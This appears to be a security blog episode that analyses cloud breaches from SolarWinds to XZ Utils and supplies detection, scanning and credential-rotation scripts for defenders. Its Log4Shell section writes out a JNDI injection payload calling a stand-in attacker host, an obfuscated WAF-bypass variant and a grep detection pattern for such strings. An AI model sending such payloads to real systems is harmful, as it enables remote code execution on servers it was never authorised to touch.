Flow observability tells you what connections exist. EP11 goes one level deeper: what names your pods are resolving those connections to. DNS is where a compromised workload first reveals itself — it queries a domain that has no business being queried from a production pod, and if you’re not watching the kernel-level DNS path, you won’t see it until after the damage.

DNS observability at the kernel level hooks the socket path that DNS queries and responses travel (UDP and TCP port 53). It is the same ground-truth approach as flow telemetry, applied to name resolution: every query, every response, tied to the pod that made it, without deploying a sidecar.

Next: DNS observability at the kernel level — what your pods are actually resolving

Get EP11 in your inbox when it publishes → linuxcent.com/subscribe

Cloud Security Breaches 2020–2025: What Actually Got Exploited

Reading Time: 11 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025


TL;DR

  • Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident falls into at least one
  • SolarWinds (Dec 2020): build pipeline compromise — attacker signed malware with a legitimate cert (A08)
  • Log4Shell (Dec 2021): injection in a logging library present in millions of Java apps (A03)
  • Uber (Sep 2022): MFA fatigue against a contractor → hardcoded admin creds on internal share (A07 + A02)
  • CircleCI (Jan 2023): session token stolen from an engineer’s laptop → CI/CD secrets exfiltrated (A07 + A08)
  • Okta (Oct 2023): support system access via stolen credentials → customer tenant data exposed (A07)
  • XZ Utils (Mar 2024): 2-year social engineering campaign → backdoor in release tarball (A08 + A06)
  • The attack surface does not change — only the specific vector within each category

OWASP Mapping: This episode is cross-category — A01 through A10 all appear. Each breach is annotated with its primary OWASP mapping.


The Big Picture

┌────────────────────────────────────────────────────────────────────┐
│           2020–2025 BREACH TIMELINE                                │
│                                                                    │
│  Dec 2020    Dec 2021    Sep 2022    Jan 2023    Oct 2023  Mar 2024│
│     │            │           │           │           │        │    │
│     ▼            ▼           ▼           ▼           ▼        ▼    │
│  Solar-      Log4Shell     Uber       CircleCI     Okta    XZ Utils│
│  Winds                                                             │
│                                                                    │
│  ══════════════════════════════════════════════════════════        │
│                                                                    │
│  Root Cause Categories (3 total):                                  │
│                                                                    │
│  SUPPLY CHAIN          IDENTITY               MISCONFIGURATION     │
│  SolarWinds            Uber                   Capital One (2019)   │
│  XZ Utils              Okta                   CircleCI (partial)   │
│  Log4Shell (partial)   CircleCI (initial)                          │
│                                                                    │
│  OWASP Primaries:                                                  │
│  A08 → A03 → A07 → A07/A08 → A07 → A08/A06                         │
│                                                                    │
└────────────────────────────────────────────────────────────────────┘

The cloud security breaches from 2020 to 2025 reveal a consistent pattern: attackers are not finding new classes of vulnerability. They are exploiting the same three root causes — identity, supply chain, misconfiguration — in different combinations against different technology stacks.


Why These Breaches Are the Curriculum

Every episode in this series from EP04 onward takes a specific attack path from these incidents and walks through the simulation, detection, and fix. You cannot understand the fix without understanding the breach mechanics. And you cannot understand why your detection didn’t fire without knowing what the attacker actually did.

This episode is the reference. When EP05 covers MFA fatigue, it builds on the Uber anatomy here. When EP09 covers XZ Utils, the supply chain mechanics here are the foundation.


December 2020: SolarWinds — Supply Chain at Scale

OWASP: A08 (Software and Data Integrity Failures)

SolarWinds is the incident that defined supply chain attacks for the decade. The attacker — attributed to Russia’s SVR — compromised the build environment for SolarWinds Orion IT monitoring software in early 2020. They inserted a backdoor called SUNBURST into the software build pipeline.

The mechanics:

Normal build pipeline:
  Source code → Build system → Sign with SolarWinds cert → Distribute → Customer installs

Compromised pipeline (SolarWinds):
  Source code → Build system → [SUNBURST injected here] → Sign with SolarWinds cert → Distribute → 18,000 customers install

SUNBURST was signed with SolarWinds’ legitimate Authenticode certificate. It passed signature verification. It was distributed through the normal software update mechanism. Customers with automatic updates installed it because the update was signed by a trusted vendor.

The backdoor remained dormant for 12–14 days after installation before activating. It used DGA (domain generation algorithm) to contact C2 infrastructure, disguising traffic as Orion telemetry. After the initial beaconing period, the attacker manually selected targets from the 18,000 infected environments.

Confirmed affected organizations: US Treasury, US Commerce Department, FireEye, Microsoft, Intel, Deloitte.

What a detection would have looked like:
– Unexpected outbound DNS queries to avsvmcloud.com subdomains
– Orion software making network connections outside its normal profile
– New scheduled tasks or service modifications by the Orion process
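The first indicator can be hunted retroactively in resolver logs. A minimal sketch, assuming a hypothetical log format of one query per line as `timestamp client_ip query_name` (adjust the field numbers for your resolver); `sunburst_dns_hits` is an illustrative name, not an existing tool:

```shell
# Hypothetical helper: count queries per client for avsvmcloud.com and its
# subdomains. Assumed input format, one query per line: "timestamp client_ip qname".
sunburst_dns_hits() {
  awk '{
    # Prefix a dot so both "avsvmcloud.com" and "x.avsvmcloud.com" match,
    # while look-alikes such as "notavsvmcloud.com" do not.
    q = "." tolower($3)
    if (q ~ /\.avsvmcloud\.com\.?$/) hits[$2]++
  }
  END { for (client in hits) print client, hits[client] }' "$@" | sort
}
```

Usage: `sunburst_dns_hits queries.log` prints one `client_ip count` line per host that resolved the domain; any hit warrants a look at that host.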

The structural failure: The build system was not isolated, not monitored for unexpected behavior, and the build process itself was not reproducible from source. A reproducible build would have made the SUNBURST injection detectable — the build output would not match the source.
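The reproducible-build check reduces to a byte-for-byte comparison between what the vendor shipped and what an independent rebuild of the same tagged source produces. A minimal sketch, assuming GNU coreutils `sha256sum` and two already-built files; `rebuild_matches` is a hypothetical helper. In practice you compare unsigned outputs (or strip the signature first), because the signature alone makes the bytes differ.

```shell
# Hypothetical helper for a reproducible-build check.
# $1: artifact as shipped by the vendor; $2: artifact rebuilt from the same source
rebuild_matches() {
  shipped_hash=$(sha256sum < "$1" | cut -d' ' -f1)
  rebuilt_hash=$(sha256sum < "$2" | cut -d' ' -f1)
  if [ "$shipped_hash" = "$rebuilt_hash" ]; then
    echo "MATCH $shipped_hash"
  else
    # A difference means the build is not reproducible, or the shipped
    # artifact was altered somewhere between source and distribution.
    echo "MISMATCH shipped=$shipped_hash rebuilt=$rebuilt_hash"
    return 1
  fi
}
```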


December 2021: Log4Shell — Injection in a Logging Library

OWASP: A03 (Injection), A06 (Vulnerable and Outdated Components)

Log4Shell (CVE-2021-44228) is the closest thing to a universal vulnerability the 2020s have produced. Log4j 2.x was embedded in thousands of Java applications, often not as a direct dependency but as a transitive one, several layers deep in the dependency tree. Developers frequently didn’t know they were running it.

The vulnerability: Log4j evaluated JNDI (Java Naming and Directory Interface) lookups embedded in logged strings. Any input that ended up in a log message could trigger a JNDI lookup:

${jndi:ldap://attacker.com/exploit}

# Log4j evaluates the expression, makes LDAP request to attacker.com
# Attacker's LDAP server responds with a Java class
# Log4j loads and executes the class
# Result: remote code execution

The attack was trivial to launch and extremely difficult to fully enumerate exposure for — because Log4j was present as a transitive dependency in components that teams didn’t know they owned.

What made it particularly bad for cloud infrastructure:
– Lambda functions, ECS containers, EKS workloads, and Elastic Beanstalk apps all potentially affected
– Early WAF rules were bypassed with nested-lookup obfuscation such as ${${lower:j}ndi:...}
– The vulnerable JndiLookup class lived in log4j-core, not in the log4j-api JAR that applications code against, and log4j-core often arrived as an indirect dependency
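Because any logged string could carry the payload, one quick retro-hunt is to search application and access logs for lookup expressions. A minimal sketch using `grep -E`; `log4shell_suspect` is a hypothetical name, and the pattern is a heuristic: it catches the plain `${jndi:` form and nested lookups like `${${lower:j}ndi:`, but not every evasion, and a hit means an attempt, not a successful compromise.

```shell
# Hypothetical helper: print log lines that contain a Log4j lookup expression.
# Case-insensitive match on either:
#   [$][{]jndi:         the plain lookup, e.g. ${jndi:ldap://...}
#   [$][{][^}]*[$][{]   a lookup nested inside another, e.g. ${${lower:j}ndi:...}
# Bracketed [$] and [{] keep both characters literal in any POSIX ERE.
log4shell_suspect() {
  grep -Ei '[$][{]jndi:|[$][{][^}]*[$][{]' "$@"
}
```

Usage: `log4shell_suspect access.log`. Percent-encoded payloads in request URIs (`%24%7Bjndi`) will not match until the log is URL-decoded.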

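# Find Log4j core JARs on disk (rough scan; requires access to filesystems)
find / -type f -name 'log4j-core-*.jar' 2>/dev/null

# Shaded "fat" JARs can bundle Log4j under another file name: look for the
# vulnerable class inside every JAR (top-level entries only, not nested JARs)
find / -type f -name '*.jar' 2>/dev/null | while read -r jar; do
  unzip -l "$jar" 2>/dev/null | grep -q 'org/apache/logging/log4j/core/lookup/JndiLookup.class' && echo "$jar"
done

# In a Kubernetes context: list every distinct running image and scan each one
kubectl get pods -A -o json | \
  jq -r '.items[].spec.containers[].image' | \
  sort -u | \
  while read -r image; do
    trivy image --severity CRITICAL "$image" < /dev/null
  done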

The fix was patching: upgrading Log4j to 2.17.1 or later (on Java 8+). The early stopgaps were setting log4j2.formatMsgNoLookups=true, which later proved incomplete (CVE-2021-45046), or removing the JndiLookup class from the classpath. Neither stopgap addressed the root cause: an outdated component with a critical CVE.


September 2022: Uber — MFA Fatigue Meets Hardcoded Credentials

OWASP: A07 (Identification and Authentication Failures), A02 (Cryptographic Failures)

The Uber breach is a clean illustration of attack chaining: one authentication failure enables discovery of a second authentication failure.

Step-by-step anatomy:

  1. Attacker purchases Uber contractor credentials on a criminal marketplace (or phishes them directly)
  2. Contractor has MFA enrolled — Duo push notifications
  3. Attacker initiates login repeatedly, triggering Duo push notifications to contractor’s phone
  4. Contractor rejects 3–4 push notifications
  5. Attacker sends WhatsApp message to contractor’s phone: “Hi, this is IT support. We’re having an issue with your account. Please accept the next Duo notification.”
  6. Contractor accepts
  7. Attacker is in

From inside the Uber network, the attacker found a network share accessible to contractors. On that share: a PowerShell script. In that script: hardcoded admin credentials for Thycotic, Uber’s privileged access management (PAM) system.

With Thycotic admin access, the attacker retrieved credentials for: AWS, GCP, GSuite, VMware, Slack, HackerOne. Full internal access.

The two failures:
– A07: Push-notification MFA that can be defeated by social engineering + fatigue
– A02: Admin credentials in a plaintext PowerShell script on a network share
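The second failure is the easier one to find before an attacker does. A minimal sketch, assuming GNU grep and a mounted share path; `find_hardcoded_creds` is a hypothetical name, and the two patterns (a quoted literal assigned to a password-like variable, and PowerShell’s `ConvertTo-SecureString ... -AsPlainText`) are common tells, not an exhaustive secret scanner.

```shell
# Hypothetical helper: flag likely hardcoded credentials in scripts.
# $1: directory to scan, e.g. a mounted network share
# Pattern 1: password-like variable assigned a quoted literal, e.g. $Password = "..."
# Pattern 2: a plaintext string turned into a SecureString inside the script
find_hardcoded_creds() {
  grep -rniE \
    --include='*.ps1' --include='*.psm1' --include='*.bat' --include='*.cmd' \
    "(password|passwd|pwd|secret)[[:space:]]*=[[:space:]]*[\"']|ConvertTo-SecureString.*-AsPlainText" \
    "$1"
}
```

Each hit prints as `file:line:content`, so the output doubles as a remediation list.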

# Detect MFA fatigue attempts in Okta logs (if Okta is the IdP)
# Ranks users by MFA failures over the last 7 days; a burst of failures followed
# shortly by a success is the fatigue pattern (first page of up to 1000 events)
curl -sG -H "Authorization: SSWS ${OKTA_API_TOKEN}" -H "Accept: application/json" \
  --data-urlencode 'filter=eventType eq "user.authentication.auth_via_mfa"' \
  --data-urlencode "since=$(date -u -d '7 days ago' +%Y-%m-%dT%H:%M:%SZ)" \
  --data-urlencode 'limit=1000' \
  "https://your-org.okta.com/api/v1/logs" | \
  jq '[.[] | select(.outcome.result == "FAILURE")] | group_by(.actor.id) | map({user: .[0].actor.displayName, failures: length}) | sort_by(.failures) | reverse | .[0:10]'
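Counting failures alone flags typos as readily as attacks; the fatigue signature is a run of failures followed by a success. A minimal sketch in awk, assuming you have first flattened the log into a hypothetical CSV of `epoch_seconds,user,result` in time order (result `SUCCESS` or `FAILURE`); `mfa_fatigue`, `THRESHOLD` (default 3) and `WINDOW` (default 600 seconds) are illustrative names and values, not Okta settings.

```shell
# Hypothetical helper. Assumed input: CSV "epoch_seconds,user,result", time-ordered.
# Alerts when a user has >= THRESHOLD failures followed by a success, all within
# WINDOW seconds of the first failure in the run.
mfa_fatigue() {
  awk -F',' -v threshold="${THRESHOLD:-3}" -v window="${WINDOW:-600}" '
    {
      t = $1 + 0; user = $2; result = $3
      # Start a fresh run if the earlier failures fall outside the window.
      if (fails[user] > 0 && t - first[user] > window) fails[user] = 0
      if (result == "FAILURE") {
        if (fails[user] == 0) first[user] = t
        fails[user]++
      } else if (result == "SUCCESS") {
        if (fails[user] >= threshold)
          printf "ALERT %s: %d failures then success in %ds\n", user, fails[user], t - first[user]
        fails[user] = 0
      }
    }' "$@"
}
```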

The structural fix for MFA fatigue is not user training. It is replacing push-notification MFA with phishing-resistant MFA: FIDO2 hardware keys (YubiKey) or passkeys. A hardware key requires physical presence — a WhatsApp message cannot convince a hardware key to authenticate.


January 2023: CircleCI — Session Token Theft and Secret Exfiltration

OWASP: A07 (Identification and Authentication Failures), A08 (Software and Data Integrity Failures)

CircleCI disclosed in January 2023 that an attacker had accessed customer data — specifically, environment variables, tokens, and keys stored by customers in CircleCI’s secret storage.

The attack chain:

  1. Malware on a CircleCI engineer’s laptop stole a 2FA-backed SSO session token
  2. The session token was valid and not yet expired — no MFA re-challenge for the session
  3. Attacker used the session token to access CircleCI’s internal systems
  4. From internal systems, attacker accessed the production database containing encrypted customer secrets
  5. The encryption keys were also accessible — attacker obtained both

The attack did not break encryption. It circumvented encryption by accessing the keys through internal systems that the compromised session token could reach.

What customers stored in CircleCI that was exposed:
– AWS IAM access keys and secret keys
– GitHub tokens
– DockerHub credentials
– SSH private keys
– API tokens for third-party services

The scale: CircleCI could not enumerate which customer secrets were accessed — they notified all customers with environment variables stored in the system.

# After a CI/CD platform breach: rotate all credentials that were stored there
# Start with AWS credentials — find and disable exposed access keys

# List every IAM user's access keys with status and creation date
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read -r user; do
    aws iam list-access-keys --user-name "$user" \
      --query "AccessKeyMetadata[].{User:'$user',Key:AccessKeyId,Status:Status,Created:CreateDate}" \
      --output table < /dev/null
  done

# Disable a specific access key
aws iam update-access-key \
  --access-key-id AKIAIOSFODNN7EXAMPLE \
  --status Inactive \
  --user-name affected-user
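In larger accounts the per-user tables get noisy. A narrower question after a CI/CD breach is which keys are still active and were last rotated before a cutoff you choose. A minimal sketch over the IAM credential report CSV (column 1 is `user`, 9/10 are `access_key_1_active`/`access_key_1_last_rotated`, 14/15 the same for key 2); `stale_active_keys` is a hypothetical name:

```shell
# Hypothetical helper: read an IAM credential report CSV on stdin and print
# active access keys last rotated before a cutoff.
# $1: cutoff as an ISO 8601 date, e.g. 2023-01-05. ISO 8601 timestamps sort
# correctly as plain strings, so awk's string "<" compares them by date.
stale_active_keys() {
  awk -F',' -v cutoff="$1" '
    NR > 1 {
      if ($9 == "true" && $10 < cutoff)  print $1 " key1 last rotated " $10
      if ($14 == "true" && $15 < cutoff) print $1 " key2 last rotated " $15
    }'
}
```

Usage, after `aws iam generate-credential-report` has completed: `aws iam get-credential-report --query Content --output text | base64 -d | stale_active_keys 2023-01-05`.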

The structural lesson: Secrets stored in a CI/CD platform are only as secure as that platform’s internal access controls and the endpoint security of the engineers who access it. The alternative — short-lived credentials via OIDC workload identity — means no long-lived secrets exist to exfiltrate.


October 2023: Okta — Support System Compromise

OWASP: A07 (Identification and Authentication Failures)

Okta is the identity provider for thousands of organizations. An attacker who compromises Okta’s support system can reach whatever customers have attached to support cases, and some of those attachments grant access to customer identity configurations.

In October 2023, Okta disclosed that an attacker had accessed their customer support case management system using stolen credentials. The attacker used that access to view HTTP Archive (HAR) files that customers had uploaded as part of support tickets. HAR files record the HTTP traffic of a browser session, including session cookies and authentication tokens.

What the attacker retrieved from HAR files:
– Active session tokens for customer Okta admin accounts
– Enough data to authenticate as Okta admins for affected customers

Customers that publicly confirmed being targeted:
– 1Password (detected and contained quickly)
– Cloudflare
– BeyondTrust

The dwell time: Okta’s later forensic analysis found the attacker had access to the support system for roughly three weeks, from September 28 to October 17, 2023.

# Check Okta System Log for suspicious admin activity
# Lists session starts for the last 30 days; review admin accounts for unusual
# IPs or times (GNU date; returns the first page of up to 1000 events only)
curl -sG -H "Authorization: SSWS ${OKTA_API_TOKEN}" -H "Accept: application/json" \
  --data-urlencode 'filter=eventType eq "user.session.start" and actor.type eq "User"' \
  --data-urlencode "since=$(date -u -d '30 days ago' +%Y-%m-%dT%H:%M:%SZ)" \
  --data-urlencode 'limit=1000' \
  "https://your-org.okta.com/api/v1/logs" | \
  jq '.[] | {user: .actor.displayName, ip: .client.ipAddress, time: .published, result: .outcome.result}'
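A stolen HAR session is replayed from the attacker’s own infrastructure, so one signal is a single session appearing from more than one IP address. A minimal sketch, assuming you have extracted events into a hypothetical CSV of `session_id,user,ip` in time order (from your IdP’s session identifier and `client.ipAddress`); `session_ip_changes` is an illustrative name. Expect false positives from mobile networks and VPN reconnects, so triage Tier-0 accounts first.

```shell
# Hypothetical helper. Assumed input: CSV "session_id,user,ip", time-ordered.
# Prints one alert per session the first time it appears from a new IP.
session_ip_changes() {
  awk -F',' '
    # Remember the IP each session was first seen from.
    !($1 in first_ip) { first_ip[$1] = $3; next }
    # Later event from a different IP: alert once per session.
    $3 != first_ip[$1] && !($1 in alerted) {
      alerted[$1] = 1
      printf "ALERT session %s (%s): %s -> %s\n", $1, $2, first_ip[$1], $3
    }' "$@"
}
```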

The structural implication for organizations using Okta: Tier-0 accounts (Okta administrators) need break-glass procedures and hardware key MFA — not because Okta itself will be compromised, but because a support system compromise at a SaaS provider can expose session context that reaches those accounts.


March 2024: XZ Utils — Two Years of Social Engineering

OWASP: A08 (Software and Data Integrity Failures), A06 (Vulnerable and Outdated Components)

XZ Utils (CVE-2024-3094) is the most sophisticated supply chain attack to date in the open-source ecosystem. The attacker operated under the pseudonym “Jia Tan” and spent approximately two years building trust in the XZ Utils project before inserting a backdoor.

The timeline:

2021 Q4 — Jia Tan begins contributing to XZ Utils with legitimate, high-quality patches
2022 Q2 — Suspected sock-puppet accounts pressure the original maintainer, who publicly
          cites burnout, to hand over more of the project; Jia Tan's role grows
2022 Q4 — Jia Tan gains commit access to XZ Utils
2024 Q1 — Jia Tan releases XZ Utils 5.6.0 (February) and 5.6.1 (March) with a backdoor;
          the activation code is NOT in the git repository, only in the release tarball
2024 Q1 — Andres Freund (Microsoft engineer, incidentally) notices SSH logins are ~500ms
          slower on systems with xz 5.6.x; investigates; finds backdoor
          Disclosed publicly March 29, 2024 as CVE-2024-3094

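The backdoor’s target: The malicious code lived in liblzma. Many glibc-based distributions patch OpenSSH so that sshd links libsystemd, which in turn loads liblzma; through that path the backdoor hooked sshd’s RSA signature check (RSA_public_decrypt). Anyone holding the attacker’s Ed448 private key could then send a signed payload that the SSH server executed before authentication: pre-authentication remote code execution, not just an authentication bypass.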

What was 1–2 weeks from shipping broadly:
– Fedora 40 (test release only — caught before stable)
– Debian unstable/testing
– openSUSE Tumbleweed

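The detection insight: The code that activated the backdoor was in the release tarball, not the git repository: a modified build-to-host.m4 that extracted the payload from binary test files during the build. Those test files were committed to git, but they looked like ordinary compressed test data, so git clone and git diff would not have revealed the backdoor. The practical detection paths were comparing the distributed tarball against the tagged source (or a reproducible build from it), or noticing the anomalous SSH latency.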
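Comparing a release tarball with the tag it claims to come from is a concrete version of that check. A minimal sketch, assuming git and a tar that supports `--strip-components` (GNU tar and bsdtar both do); `compare_tarball_to_tag` is a hypothetical name. Expect noise: autotools projects legitimately ship generated files that are not in git, which is exactly where build-to-host.m4 hid, so every tarball-only file deserves a look.

```shell
# Hypothetical helper: diff a release tarball against the git tag it claims.
# $1: release tarball, $2: local clone of the project, $3: tag the release claims
compare_tarball_to_tag() {
  work=$(mktemp -d)
  mkdir "$work/tar" "$work/git"
  # Release tarballs usually wrap everything in a top-level "name-version/" dir
  tar -xf "$1" -C "$work/tar" --strip-components=1
  git -C "$2" archive "$3" | tar -xf - -C "$work/git"
  # Lists files whose contents differ and files present on only one side
  diff -rq "$work/git" "$work/tar"
  status=$?
  rm -rf "$work"
  return "$status"
}
```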

# Check if your systems have the affected xz version
xz --version
# Vulnerable: 5.6.0 or 5.6.1

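# Check on RPM-based systems (xz-libs ships the liblzma that sshd loads)
rpm -q xz xz-libs

# Check on Debian/Ubuntu systems (liblzma5 ships the library)
dpkg -l xz-utils liblzma5

# Check whether sshd links liblzma (directly or via libsystemd)
ldd "$(command -v sshd || echo /usr/sbin/sshd)" | grep liblzma
# If liblzma is present and xz is 5.6.0 or 5.6.1, the system was exposed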
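To run the version check across a fleet, the decision can be scripted. A minimal sketch that reads `xz --version` output on stdin and exits 0 only for the two backdoored releases; `xz_backdoored_version` is a hypothetical name.

```shell
# Hypothetical helper. `xz --version` prints e.g. "xz (XZ Utils) 5.6.1" and then
# "liblzma 5.6.1". Take the last field of the XZ Utils line and exit 0 only
# for 5.6.0 or 5.6.1; exit 1 otherwise.
xz_backdoored_version() {
  awk '/XZ Utils/ { v = $NF } END { exit !(v == "5.6.0" || v == "5.6.1") }'
}
```

Usage: `xz --version | xz_backdoored_version && echo "EXPOSED: $(hostname)"`.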

The Three Root Causes: A Framework for Your Exercise Backlog

Across these six incidents (and the broader 2020–2025 breach landscape), three root causes account for nearly every major cloud infrastructure compromise:

┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  ROOT CAUSE 1: IDENTITY                                         │
│  Attacker obtains valid credentials — stolen, phished,          │
│  or socially engineered. MFA does not stop it if MFA            │
│  itself can be bypassed (fatigue, SIM swap, token theft).       │
│  Incidents: Uber, Okta, CircleCI (initial vector)               │
│                                                                 │
│  ROOT CAUSE 2: SUPPLY CHAIN                                     │
│  Attacker compromises something you trust: a vendor's           │
│  software, a build pipeline, an open-source dependency.         │
│  The artifact you install is legitimate — and malicious.        │
│  Incidents: SolarWinds, XZ Utils, Log4Shell (component)         │
│                                                                 │
│  ROOT CAUSE 3: MISCONFIGURATION                                 │
│  An access control is wrong. A resource is exposed that         │
│  shouldn't be. An encryption requirement is missing.            │
│  No attacker capability required — just knowledge of the gap.   │
│  Incidents: Capital One (S3 + IAM), public buckets broadly      │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

Your purple team exercise backlog should cover all three. The remaining episodes in this series address each one:

  • Identity: EP05 (MFA fatigue), EP10 (cross-account lateral movement)
  • Supply chain: EP06 (CI/CD secrets), EP09 (SolarWinds to XZ Utils)
  • Misconfiguration: EP04 (broken access control in AWS), EP07 (SSRF/IMDS), EP08 (container escape)

Run This in Your Own Environment: Breach Scenario Self-Assessment

Before starting the technique-specific episodes, run this self-assessment to identify which breach scenario your environment is most exposed to:

#!/bin/bash
# Purple Team EP03: Breach Exposure Self-Assessment
# Assumes AWS CLI v2 and jq; EC2 and Lambda checks cover the current region only

echo "=== IDENTITY EXPOSURE ==="
echo "--- Users with console access and no MFA ---"
# Report generation is asynchronous: poll (up to ~20s) until it is COMPLETE
for _ in 1 2 3 4 5 6 7 8 9 10; do
  STATE=$(aws iam generate-credential-report --query State --output text 2>/dev/null)
  [ "$STATE" = "COMPLETE" ] && break
  sleep 2
done
# Credential report CSV: column 4 = password_enabled, column 8 = mfa_active
aws iam get-credential-report --query 'Content' --output text | \
  base64 -d | awk -F',' 'NR>1 && $4=="true" && $8=="false" {print "  NO MFA: " $1}'

echo ""
echo "=== SUPPLY CHAIN EXPOSURE ==="
echo "--- Lambda functions with old runtimes (EOL = higher CVE exposure) ---"
aws lambda list-functions \
  --query 'Functions[?Runtime==`python3.8` || Runtime==`nodejs14.x` || Runtime==`java8`].{Name:FunctionName,Runtime:Runtime}' \
  --output table

echo ""
echo "=== MISCONFIGURATION EXPOSURE ==="
echo "--- Account-level S3 Block Public Access ---"
ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
PAB=$(aws s3control get-public-access-block --account-id "$ACCOUNT" 2>/dev/null)
if [ -z "$PAB" ]; then
  echo "  CRITICAL: Account-level S3 public access block is NOT set (or could not be read)"
else
  echo "$PAB" | jq '.PublicAccessBlockConfiguration | {BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, RestrictPublicBuckets}'
fi

echo ""
echo "--- EC2 instances with IMDSv1 enabled (SSRF risk) ---"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens!=`required`][].{ID:InstanceId,State:State.Name}' \
  --output table

⚠ Common Mistakes When Using Breach History as a Training Resource

Assuming “we’re not SolarWinds” means supply chain doesn’t apply. You don’t have to be a software vendor. Your GitHub Actions workflows pull third-party actions. Your Dockerfiles pull base images. Your Lambda functions install pip packages. Every external artifact is a supply chain dependency.

Treating Log4Shell as “old news.” The vulnerability was disclosed in 2021. Organizations are still finding Log4j in unexpected places in 2024 — embedded in monitoring agents, database drivers, and vendor-supplied applications where the dependency tree was never audited.

Responding to Uber/Okta by mandating security awareness training. The Uber breach happened to an experienced contractor who made one decision under social pressure. The structural fix is hardware MFA that cannot be fatigue-attacked — not a training module that adds friction and gets clicked through.

Not correlating your own logs against breach indicators. Every breach in this episode produced specific, searchable indicators: specific CloudTrail event patterns, specific process behaviors, specific network anomalies. If you have historical logs, you can run indicators of compromise against them to see whether your environment would have surfaced those indicators.
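A minimal sketch of that retro-hunt for plain-text logs, assuming GNU grep, a hypothetical indicator file with one indicator per line (domains, IPs, hashes) and a directory of exported logs; `ioc_sweep` is an illustrative name. It counts hits per indicator, which tells you where to start looking, not whether a compromise happened.

```shell
# Hypothetical helper. $1: indicator file (one per line), $2: log directory.
ioc_sweep() {
  patterns=$(mktemp)
  # Drop blank lines: an empty pattern would match every log line.
  grep -v '^[[:space:]]*$' "$1" > "$patterns"
  # -r recurse, -h no filenames, -o print only the match, -i ignore case,
  # -F fixed strings, -f read patterns from file; then count hits per indicator.
  grep -rhoiF -f "$patterns" "$2" | tr '[:upper:]' '[:lower:]' | sort | uniq -c | sort -rn
  rm -f "$patterns"
}
```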


Quick Reference

Breach      Year  OWASP Primary  Root Cause                                           Structural Fix
SolarWinds  2020  A08            Supply chain: build pipeline compromise              Reproducible builds, build system isolation
Log4Shell   2021  A03, A06       Injection + vulnerable component                     Patch + dependency inventory
Uber        2022  A07, A02       Identity: MFA fatigue + hardcoded creds              Hardware MFA + no hardcoded secrets
CircleCI    2023  A07, A08       Identity: session token theft → CI secret theft      OIDC short-lived creds instead of stored secrets
Okta        2023  A07            Identity: support system compromise → token theft    Hardware MFA for tier-0, session token rotation
XZ Utils    2024  A08, A06       Supply chain: social engineering → maintainer trust  Reproducible builds, artifact signing, SLSA

Key Takeaways

  • Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident is one or more of these
  • SolarWinds and XZ Utils are the same attack class: compromise the build pipeline and sign the result with a trusted key
  • Uber demonstrates that MFA does not prevent breach when the MFA mechanism is push-notification — fatigue + social engineering defeats it
  • CircleCI demonstrates that long-lived secrets stored in a CI/CD platform are only as secure as that platform — OIDC short-lived credentials eliminate the exposure
  • Log4Shell demonstrates that vulnerable transitive dependencies are invisible without active dependency scanning — “we didn’t use Log4j” was wrong for thousands of organizations
  • The attack surface does not change: the same three root causes that caused SolarWinds in 2020 caused XZ Utils in 2024
  • Your purple team exercise backlog should include at least one scenario for each of the three root causes

What’s Next

EP04 starts the technique-specific episodes with broken access control in AWS — the most common OWASP A01 manifestation in cloud infrastructure. The exercise scenario: an S3 bucket with 47 million records, public for six months, with no alert ever firing. We simulate it, detect it, and fix the IAM and S3 configuration so it cannot happen in your account. If you want the full context for AWS IAM privilege escalation paths that broken access control enables, the IAM series EP08 covers that attack chain in detail.

Get EP04 in your inbox when it publishes → subscribe at linuxcent.com